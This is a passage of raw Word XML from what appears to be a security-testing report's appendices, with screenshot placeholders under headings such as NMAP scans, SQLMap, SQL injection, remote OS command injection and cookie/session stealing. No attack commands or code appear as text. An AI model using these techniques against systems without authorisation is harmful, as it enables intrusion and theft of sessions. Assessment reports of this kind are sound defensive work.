        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[36]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. McDaniel, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>HTML5 : your Visual blueprint for designing rich web pages and applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Wiley, 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0800AF25" w14:textId="77777777" w:rsidR="008A3D97" w:rsidRPr="008A3D97" w:rsidRDefault="008A3D97" w:rsidP="008A3D97">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4BC3AF" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="006B753E" w:rsidP="001B121C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc501124796"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="001B121C" w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>. Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="7E9ECE9D" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C"/>
    <w:p w14:paraId="2D694629" w14:textId="77777777" w:rsidR="00E2213C" w:rsidRDefault="00DE459D" w:rsidP="00E2213C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DNS Lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB566BD" w14:textId="77777777" w:rsidR="002C13B1" w:rsidRDefault="00E2213C" w:rsidP="00CC1C29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B582632" wp14:editId="3FBE1691">
            <wp:extent cx="5844556" cy="1760561"/>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NS Lookup.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1130" t="5227" r="2096" b="4847"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5862334" cy="1765916"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C334450" w14:textId="77777777" w:rsidR="00E2213C" w:rsidRDefault="00E2213C" w:rsidP="00425F16"/>
    <w:p w14:paraId="35D0A13B" w14:textId="77777777" w:rsidR="00572AC2" w:rsidRDefault="00E2213C" w:rsidP="002C13B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTTP Lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC62B0E" w14:textId="77777777" w:rsidR="00C65DB3" w:rsidRDefault="00E2213C" w:rsidP="00CC1C29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A74A0AC" wp14:editId="6744EB2E">
            <wp:extent cx="5954233" cy="3775984"/>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TTP Lookup.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5961155" cy="3780373"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="106E6AAA" w14:textId="77777777" w:rsidR="00C65DB3" w:rsidRDefault="00C65DB3" w:rsidP="002C13B1"/>
    <w:p w14:paraId="76FEC689" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="27135A40" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="2C7A130E" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="6239D6B4" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="5FEE9054" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="5E23D7A8" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="20152C83" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="67596751" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="6BDD846F" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="2C2E99C0" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="12CD254F" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="631CF0E8" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="002C13B1"/>
    <w:p w14:paraId="6852F0BC" w14:textId="77777777" w:rsidR="00425F16" w:rsidRDefault="00425F16" w:rsidP="00425F16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NMAP Scan</w:t>
      </w:r>
      <w:r w:rsidR="005C0E93">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EA512F" w14:textId="77777777" w:rsidR="003123EE" w:rsidRDefault="003123EE" w:rsidP="003123EE"/>
    <w:p w14:paraId="48395FB3" w14:textId="77777777" w:rsidR="005C0E93" w:rsidRDefault="005C0E93" w:rsidP="00CC1C29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59FF37EC" wp14:editId="2F114E60">
            <wp:extent cx="6014371" cy="2700670"/>
            <wp:effectExtent l="0" t="0" r="571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MAP Scan (1).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6018044" cy="2702319"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1937E2" w14:textId="77777777" w:rsidR="003123EE" w:rsidRDefault="003123EE" w:rsidP="003123EE"/>
    <w:p w14:paraId="4E81BB7B" w14:textId="77777777" w:rsidR="003123EE" w:rsidRDefault="005C0E93" w:rsidP="003123EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45F87318" wp14:editId="67643EBA">
            <wp:extent cx="5986130" cy="1194441"/>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NMAP Scan (2).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6015817" cy="1200365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62024A7A" w14:textId="77777777" w:rsidR="005C0E93" w:rsidRDefault="005C0E93" w:rsidP="003123EE"/>
    <w:p w14:paraId="0CF020A3" w14:textId="77777777" w:rsidR="0058527C" w:rsidRDefault="0058527C" w:rsidP="003123EE"/>
    <w:p w14:paraId="7320B96B" w14:textId="77777777" w:rsidR="003123EE" w:rsidRDefault="003123EE" w:rsidP="00425F16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SQL Map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49764484" w14:textId="77777777" w:rsidR="003123EE" w:rsidRDefault="003123EE" w:rsidP="001B121C"/>
    <w:p w14:paraId="592F6587" w14:textId="77777777" w:rsidR="003123EE" w:rsidRDefault="003123EE" w:rsidP="00CC1C29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BC74BB3" wp14:editId="77AFDB9B">
            <wp:extent cx="5847907" cy="3052885"/>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QL Map.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5850532" cy="3054255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A56C343" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="3D8DA54D" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="001B121C"/>
    <w:p w14:paraId="7E0B4B24" w14:textId="77777777" w:rsidR="00B31F6C" w:rsidRDefault="00B31F6C" w:rsidP="001B121C"/>
    <w:p w14:paraId="124EB1EC" w14:textId="77777777" w:rsidR="00B31F6C" w:rsidRDefault="00B31F6C" w:rsidP="00B31F6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Failed Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C585D" w14:textId="77777777" w:rsidR="00B31F6C" w:rsidRDefault="00B31F6C" w:rsidP="00B31F6C"/>
    <w:p w14:paraId="24A6D961" w14:textId="77777777" w:rsidR="00B31F6C" w:rsidRDefault="00B31F6C" w:rsidP="00B31F6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3088B163" wp14:editId="0709E1FC">
            <wp:extent cx="6102720" cy="21375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ailed Connection.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6283548" cy="220090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE1FCD" w14:textId="77777777" w:rsidR="006476AE" w:rsidRDefault="006476AE" w:rsidP="00B31F6C"/>
    <w:p w14:paraId="5D46D2D6" w14:textId="77777777" w:rsidR="008B2BB4" w:rsidRDefault="008B2BB4" w:rsidP="008B2BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ZAP Configuration/Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01135402" w14:textId="77777777" w:rsidR="008B2BB4" w:rsidRDefault="008B2BB4" w:rsidP="008B2BB4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8A724B" w14:textId="77777777" w:rsidR="008B2BB4" w:rsidRDefault="008B2BB4" w:rsidP="00CC1C29">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="212F2ACF" wp14:editId="298A0BC3">
            <wp:extent cx="5986534" cy="358223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Overall.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96294" cy="3588077"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F8F79" w14:textId="77777777" w:rsidR="006476AE" w:rsidRDefault="006476AE" w:rsidP="008B2BB4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3FED4C" w14:textId="77777777" w:rsidR="006476AE" w:rsidRDefault="006476AE" w:rsidP="008B2BB4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357F5C5E" w14:textId="77777777" w:rsidR="006476AE" w:rsidRDefault="008B2BB4" w:rsidP="00CC1C29">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF1F309" wp14:editId="700566C6">
            <wp:extent cx="5986028" cy="1858945"/>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ctive Scan.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000859" cy="1863551"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7207613B" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202A0188" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="068983DE" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64949DBC" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34741714" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A635AD" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57661EC3" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B714C8" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A4EC63" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0D607D" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="0058527C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3B8309" w14:textId="77777777" w:rsidR="006476AE" w:rsidRDefault="006476AE" w:rsidP="006476AE"/>
    <w:p w14:paraId="391ED220" w14:textId="77777777" w:rsidR="008B2BB4" w:rsidRDefault="006476AE" w:rsidP="008B2BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ZAP Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6FF801" w14:textId="77777777" w:rsidR="006476AE" w:rsidRDefault="006476AE" w:rsidP="006476AE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588A2B28" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="006476AE" w:rsidP="00CC1C29">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A44B736" wp14:editId="59356111">
            <wp:extent cx="5731510" cy="457200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ans Carried out.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4572000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A693D8" w14:textId="77777777" w:rsidR="0058527C" w:rsidRDefault="0058527C" w:rsidP="001B121C"/>
    <w:p w14:paraId="5C82980A" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="00FF5E87" w:rsidP="00FF5E87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F97EB" w14:textId="77777777" w:rsidR="00FF5E87" w:rsidRDefault="00FF5E87" w:rsidP="00FF5E87"/>
    <w:p w14:paraId="0643D583" w14:textId="77777777" w:rsidR="00FF5E87" w:rsidRDefault="00FF5E87" w:rsidP="00CC1C29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FD9A9D5" wp14:editId="0C55365C">
            <wp:extent cx="5998340" cy="3175279"/>
            <wp:effectExtent l="0" t="0" r="254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QL Injection.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6010121" cy="3181516"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7362AC79" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C"/>
    <w:p w14:paraId="2B7F8C67" w14:textId="77777777" w:rsidR="00FF5E87" w:rsidRDefault="00FF5E87" w:rsidP="00FF5E87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Remote OS Command Injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573A1B5E" w14:textId="77777777" w:rsidR="00FF5E87" w:rsidRDefault="00FF5E87" w:rsidP="00FF5E87"/>
    <w:p w14:paraId="6B38B7B8" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRDefault="00FF5E87" w:rsidP="00CC1C29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C132324" wp14:editId="4537ED00">
            <wp:extent cx="5983839" cy="31702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S Command Injection.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6029104" cy="3194237"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ECEE20" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="00FF5E87"/>
    <w:p w14:paraId="11782B34" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00A35A0D">
        <w:t>/Session Stealing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E1AD2" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C"/>
    <w:p w14:paraId="7FF7B537" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00CC1C29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8BF970" wp14:editId="4DECE865">
            <wp:extent cx="6219930" cy="33001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ookie Stealing.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6233050" cy="3307121"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEFF165" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C"/>
    <w:p w14:paraId="7C0C979D" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
